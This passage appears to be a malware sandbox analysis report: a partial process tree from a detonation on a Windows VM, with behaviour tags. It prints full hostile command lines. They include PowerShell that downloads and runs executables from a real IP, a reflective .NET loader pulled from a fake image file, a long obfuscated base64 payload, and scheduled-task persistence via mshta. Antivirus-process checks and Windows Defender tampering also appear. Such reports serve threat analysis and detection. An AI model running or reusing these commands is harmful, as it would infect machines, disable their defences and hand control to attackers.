                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dfghd/fgd/downloads/test.jpg?137113', 'http://uptodatesystem.com/test/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.ikfkhSk/selif_cilbup/46.622.06.26//:', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec
                  7⤵
                  • Blocklisted process makes network request
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious use of SetThreadContext
                  • Suspicious behavior: EnumeratesProcesses
                  PID:3540
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    8⤵
                    • System Location Discovery: System Language Discovery
                    PID:1480
        • C:\Users\Admin\AppData\Local\Temp\1052838001\LCESjzR.exe
          "C:\Users\Admin\AppData\Local\Temp\1052838001\LCESjzR.exe"
          3⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          PID:4444
          • C:\Users\Admin\AppData\Local\Temp\is-U7AVN.tmp\LCESjzR.tmp
            "C:\Users\Admin\AppData\Local\Temp\is-U7AVN.tmp\LCESjzR.tmp" /SL5="$E01C6,14491362,830464,C:\Users\Admin\AppData\Local\Temp\1052838001\LCESjzR.exe"
            4⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious use of FindShellTrayWindow
            PID:3272
            • C:\Users\Admin\AppData\Local\Temp\is-93EA8.tmp\driver3.exe
              "C:\Users\Admin\AppData\Local\Temp\is-93EA8.tmp\driver3.exe"
              5⤵
              • Drops startup file
              • Executes dropped EXE
              PID:5044
              • C:\Users\Admin\AppData\Roaming\update\client32.exe
                "C:\Users\Admin\AppData\Roaming\update\client32.exe"
                6⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Loads dropped DLL
                • Checks whether UAC is enabled
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                • Suspicious use of FindShellTrayWindow
                PID:1920
        • C:\Users\Admin\AppData\Local\Temp\1052869101\a19ddbcf22.exe
          "C:\Users\Admin\AppData\Local\Temp\1052869101\a19ddbcf22.exe"
          3⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          PID:4200
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c schtasks /create /tn 9kU9rmaI6MC /tr "mshta C:\Users\Admin\AppData\Local\Temp\2Y2JBMsUI.hta" /sc minute /mo 25 /ru "Admin" /f
            4⤵
            • System Location Discovery: System Language Discovery
            PID:4036
            • C:\Windows\SysWOW64\schtasks.exe
              schtasks /create /tn 9kU9rmaI6MC /tr "mshta C:\Users\Admin\AppData\Local\Temp\2Y2JBMsUI.hta" /sc minute /mo 25 /ru "Admin" /f
              5⤵
              • System Location Discovery: System Language Discovery
              • Scheduled Task/Job: Scheduled Task
              PID:852
          • C:\Windows\SysWOW64\mshta.exe
            mshta C:\Users\Admin\AppData\Local\Temp\2Y2JBMsUI.hta
            4⤵
            • Checks computer location settings
            • System Location Discovery: System Language Discovery
            PID:2540
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'PENOY35XVL6F9HKG5A0IXVPRV9VGR5AS.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
              5⤵
              • Blocklisted process makes network request
              • Command and Scripting Interpreter: PowerShell
              • Downloads MZ/PE file
              • System Location Discovery: System Language Discovery
              PID:3740
              • C:\Users\Admin\AppData\Local\TempPENOY35XVL6F9HKG5A0IXVPRV9VGR5AS.EXE
                "C:\Users\Admin\AppData\Local\TempPENOY35XVL6F9HKG5A0IXVPRV9VGR5AS.EXE"
                6⤵
                • Modifies Windows Defender DisableAntiSpyware settings
                • Modifies Windows Defender Real-time Protection settings
                • Modifies Windows Defender TamperProtection settings
                • Modifies Windows Defender notification settings
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Windows security modification
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                PID:4028
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1052870021\am_no.cmd" "
          3⤵
          • System Location Discovery: System Language Discovery
          PID:2276
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1052870021\am_no.cmd" any_word
            4⤵
            • System Location Discovery: System Language Discovery
            PID:3624
            • C:\Windows\SysWOW64\timeout.exe
              timeout /t 2
              5⤵
              • System Location Discovery: System Language Discovery
              • Delays execution with timeout.exe
              PID:4884
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
              5⤵
              • System Location Discovery: System Language Discovery
              PID:4400
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                6⤵
                • Command and Scripting Interpreter: PowerShell
                • System Location Discovery: System Language Discovery
                PID:2624
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
              5⤵
              • System Location Discovery: System Language Discovery
              PID:824
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                6⤵
                • Command and Scripting Interpreter: PowerShell
                • System Location Discovery: System Language Discovery
                PID:2440
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
              5⤵
              • System Location Discovery: System Language Discovery
              PID:3924
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                6⤵
                • Command and Scripting Interpreter: PowerShell
                • System Location Discovery: System Language Discovery
                PID:1940
            • C:\Windows\SysWOW64\schtasks.exe
              schtasks /create /tn "mCP7pma47aS" /tr "mshta \"C:\Temp\Qnd7Nib1E.hta\"" /sc minute /mo 25 /ru "Admin" /f
              5⤵
              • System Location Discovery: System Language Discovery
              • Scheduled Task/Job: Scheduled Task
              PID:2056
            • C:\Windows\SysWOW64\mshta.exe
              mshta "C:\Temp\Qnd7Nib1E.hta"
              5⤵
              • Checks computer location settings
              • System Location Discovery: System Language Discovery
              PID:3748
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                6⤵
                • Blocklisted process makes network request
                • Command and Scripting Interpreter: PowerShell
                • Downloads MZ/PE file
                • System Location Discovery: System Language Discovery
                PID:3532
                • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                  "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                  7⤵
                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                  • Checks BIOS information in registry
                  • Executes dropped EXE
                  • Identifies Wine through registry keys
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • System Location Discovery: System Language Discovery
                  PID:4644
        • C:\Users\Admin\AppData\Local\Temp\1052883001\1400d853a7.exe
          "C:\Users\Admin\AppData\Local\Temp\1052883001\1400d853a7.exe"
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          PID:3732
        • C:\Users\Admin\AppData\Local\Temp\1052895001\2cbf0a74ae.exe
          "C:\Users\Admin\AppData\Local\Temp\1052895001\2cbf0a74ae.exe"
          3⤵
          • Executes dropped EXE
          • Adds Run key to start application
          PID:4140
          • C:\Windows\SYSTEM32\cmd.exe
            cmd.exe /c 67938ad15f2a9.vbs
            4⤵
            • Checks computer location settings
            • Modifies registry class
            PID:4796
            • C:\Windows\System32\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\67938ad15f2a9.vbs"
              5⤵
              • Checks computer location settings
              PID:964
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GQ@ZgBn@Gg@Z@@v@GY@ZwBk@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@C4@agBw@Gc@Pw@x@DM@Nw@x@DE@Mw@n@Cw@I@@n@Gg@d@B0@H@@Og@v@C8@dQBw@HQ@bwBk@GE@d@Bl@HM@eQBz@HQ@ZQBt@C4@YwBv@G0@LwB0@GU@cwB0@C8@d@Bl@HM@d@@u@Go@c@Bn@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@C@@PQ@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQ@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@YgBh@HM@ZQ@2@DQ@QwBv@G0@bQBh@G4@Z@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@UwB1@GI@cwB0@HI@aQBu@Gc@K@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@L@@g@CQ@YgBh@HM@ZQ@2@DQ@T@Bl@G4@ZwB0@Gg@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@EU@bgBj@G8@Z@Bl@GQ@V@Bl@Hg@d@@g@D0@WwBD@G8@bgB2@GU@cgB0@F0@Og@6@FQ@bwBC@GE@cwBl@DY@N@BT@HQ@cgBp@G4@Zw@o@CQ@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBD@G8@bgB2@GU@cgB0@F0@Og@6@EY@cgBv@G0@QgBh@HM@ZQ@2@DQ@UwB0@HI@aQBu@Gc@K@@k@GI@YQBz@GU@Ng@0@EM@bwBt@G0@YQBu@GQ@KQ@7@C@@I@@g@CQ@d@Bl@Hg@d@@g@D0@I@@k@EU@bgBj@G8@Z@Bl@GQ@V@Bl@Hg@d@@7@C@@J@Bs@G8@YQBk@GU@Z@BB@HM@cwBl@G0@YgBs@Hk@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FI@ZQBm@Gw@ZQBj@HQ@aQBv@G4@LgBB@HM@cwBl@G0@YgBs@Hk@XQ@6@Do@T@Bv@GE@Z@@o@CQ@YwBv@G0@bQBh@G4@Z@BC@Hk@d@Bl@HM@KQ@7@C@@I@@k@EU@bgBj@G8@Z@Bl@GQ@V@Bl@Hg@d@@g@D0@WwBD@G8@bgB2@GU@cgB0@F0@Og@6@FQ@bwBC@GE@cwBl@DY@N@BT@HQ@cgBp@G4@Zw@o@CQ@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bj@G8@bQBw@HI@ZQBz@HM@ZQBk@EI@eQB0@GU@QQBy@HI@YQB5@C@@PQ@g@Ec@ZQB0@C0@QwBv@G0@c@By@GU@cwBz@GU@Z@BC@Hk@d@Bl@EE@cgBy@GE@eQ@g@C0@YgB5@HQ@ZQBB@HI@cgBh@Hk@I@@k@GU@bgBj@FQ@ZQB4@HQ@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@d@B5@H@@ZQ@g@D0@I@@k@Gw@bwBh@GQ@ZQBk@EE@cwBz@GU@bQBi@Gw@eQ@u@Ec@ZQB0@FQ@eQBw@GU@K@@n@HQ@ZQBz@HQ@c@Bv@Hc@ZQBy@HM@a@Bl@Gw@b@@u@Eg@bwBh@GE@YQBh@GE@YQBz@GQ@bQBl@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@RQBu@GM@bwBk@GU@Z@BU@GU@e@B0@C@@PQBb@EM@bwBu@HY@ZQBy@HQ@XQ@6@Do@V@Bv@EI@YQBz@GU@Ng@0@FM@d@By@Gk@bgBn@Cg@J@BC@Hk@d@Bl@HM@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@bQBl@HQ@a@Bv@GQ@I@@9@C@@J@B0@Hk@c@Bl@C4@RwBl@HQ@TQBl@HQ@a@Bv@GQ@K@@n@Gw@ZgBz@Gc@ZQBk@GQ@Z@Bk@GQ@Z@Bk@GE@Jw@p@C4@SQBu@HY@bwBr@GU@K@@k@G4@dQBs@Gw@L@@g@Fs@bwBi@Go@ZQBj@HQ@WwBd@F0@I@@o@Cc@I@B0@Hg@d@@u@Gk@awBm@Gs@a@BT@Gs@LwBz@GU@b@Bp@GY@XwBj@Gk@b@Bi@HU@c@@v@DQ@Ng@u@DY@Mg@y@C4@M@@2@C4@Mg@2@C8@Lw@6@Cc@L@@g@Cc@M@@n@Cw@I@@n@FM@d@Bh@HI@d@B1@H@@TgBh@G0@ZQ@n@Cw@I@@n@FI@ZQBn@EE@cwBt@Cc@L@@g@Cc@M@@n@Ck@KQB9@H0@';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $dosigo.replace('@','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec
                6⤵
                • Command and Scripting Interpreter: PowerShell
                PID:4724
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dfghd/fgd/downloads/test.jpg?137113', 'http://uptodatesystem.com/test/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.ikfkhSk/selif_cilbup/46.622.06.26//:', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec
                  7⤵
                  • Blocklisted process makes network request
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious use of SetThreadContext
                  PID:2912
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    8⤵
                      PID:4568
                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                      8⤵
                        PID:4872
                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                        8⤵
                        • System Location Discovery: System Language Discovery
                        PID:3988
            • C:\Users\Admin\AppData\Local\Temp\1052896001\fdd227d667.exe
              "C:\Users\Admin\AppData\Local\Temp\1052896001\fdd227d667.exe"
              3⤵
              • Enumerates VirtualBox registry keys
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              PID:4360
            • C:\Users\Admin\AppData\Local\Temp\1052897001\0f7cec18a3.exe
              "C:\Users\Admin\AppData\Local\Temp\1052897001\0f7cec18a3.exe"
              3⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              PID:4660
              • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                4⤵
                • System Location Discovery: System Language Discovery
                PID:2424
            • C:\Users\Admin\AppData\Local\Temp\1052898001\df2fa3eeb4.exe
              "C:\Users\Admin\AppData\Local\Temp\1052898001\df2fa3eeb4.exe"
              3⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              PID:4288
            • C:\Users\Admin\AppData\Local\Temp\1052899001\32c0c97ccb.exe
              "C:\Users\Admin\AppData\Local\Temp\1052899001\32c0c97ccb.exe"
              3⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              PID:628
            • C:\Users\Admin\AppData\Local\Temp\1052900001\d1253bb531.exe
              "C:\Users\Admin\AppData\Local\Temp\1052900001\d1253bb531.exe"
              3⤵
              • Checks computer location settings
              • Executes dropped EXE
              • Drops file in Windows directory
              PID:3064
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c copy Turner Turner.cmd & Turner.cmd
                4⤵
                  PID:1288
                  • C:\Windows\SysWOW64\tasklist.exe
                    tasklist
                    5⤵
                    • Enumerates processes with tasklist
                    • System Location Discovery: System Language Discovery
                    PID:4852
                  • C:\Windows\SysWOW64\findstr.exe
                    findstr /I "opssvc wrsa"
                    5⤵
                    • System Location Discovery: System Language Discovery
                    PID:1448
                  • C:\Windows\SysWOW64\tasklist.exe
                    tasklist
                    5⤵
                    • Enumerates processes with tasklist
                    • System Location Discovery: System Language Discovery
                    PID:4692
                  • C:\Windows\SysWOW64\findstr.exe
                    findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                    5⤵
                      PID:3532
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c md 764661
                      5⤵
                        PID:2432
                      • C:\Windows\SysWOW64\extrac32.exe
                        extrac32 /Y /E Fm
                        5⤵
                        • System Location Discovery: System Language Discovery
                        PID:1688
                      • C:\Windows\SysWOW64\findstr.exe
                        findstr /V "Tunnel" Addresses
                        5⤵
                        • System Location Discovery: System Language Discovery
                        PID:1384
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c copy /b 764661\Macromedia.com + Totally + York + Drunk + Baghdad + Benz + Glasses + Pac + Tender + Racing + Deluxe + Derived 764661\Macromedia.com
                        5⤵
                        • System Location Discovery: System Language Discovery
                        PID:456
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c copy /b ..\Complement + ..\Soundtrack + ..\Plumbing + ..\Hills F
                        5⤵
                        • System Location Discovery: System Language Discovery
                        PID:2600
                      • C:\Users\Admin\AppData\Local\Temp\764661\Macromedia.com
                        Macromedia.com F
                        5⤵
                        • Executes dropped EXE
                        • Suspicious use of FindShellTrayWindow
                        • Suspicious use of SendNotifyMessage
                        PID:2460
                      • C:\Windows\SysWOW64\choice.exe
                        choice /d y /t 15
                        5⤵
                        • System Location Discovery: System Language Discovery
                        PID:3832
                  • C:\Users\Admin\AppData\Local\Temp\1052901001\b226bb76a2.exe
                    "C:\Users\Admin\AppData\Local\Temp\1052901001\b226bb76a2.exe"
                    3⤵
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Checks BIOS information in registry
                    • Executes dropped EXE
                    • Identifies Wine through registry keys
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    PID:1028
                  • C:\Users\Admin\AppData\Local\Temp\1052902001\9ebca9cb64.exe
                    "C:\Users\Admin\AppData\Local\Temp\1052902001\9ebca9cb64.exe"
                    3⤵
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Checks BIOS information in registry
                    • Executes dropped EXE
                    • Identifies Wine through registry keys
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    PID:1172
              • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                1⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Suspicious behavior: EnumeratesProcesses
                PID:4960
              • C:\Users\Admin\AppData\Local\dllhost.exe
                C:\Users\Admin\AppData\Local\dllhost.exe
                1⤵
                • Executes dropped EXE
                PID:772
              • C:\Windows\system32\regsvr32.EXE
                C:\Windows\system32\regsvr32.EXE /S /i:SYNC C:\Users\Admin\AppData\Roaming\uxtheme_2.drv
                1⤵
                • Loads dropped DLL
                PID:3736
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
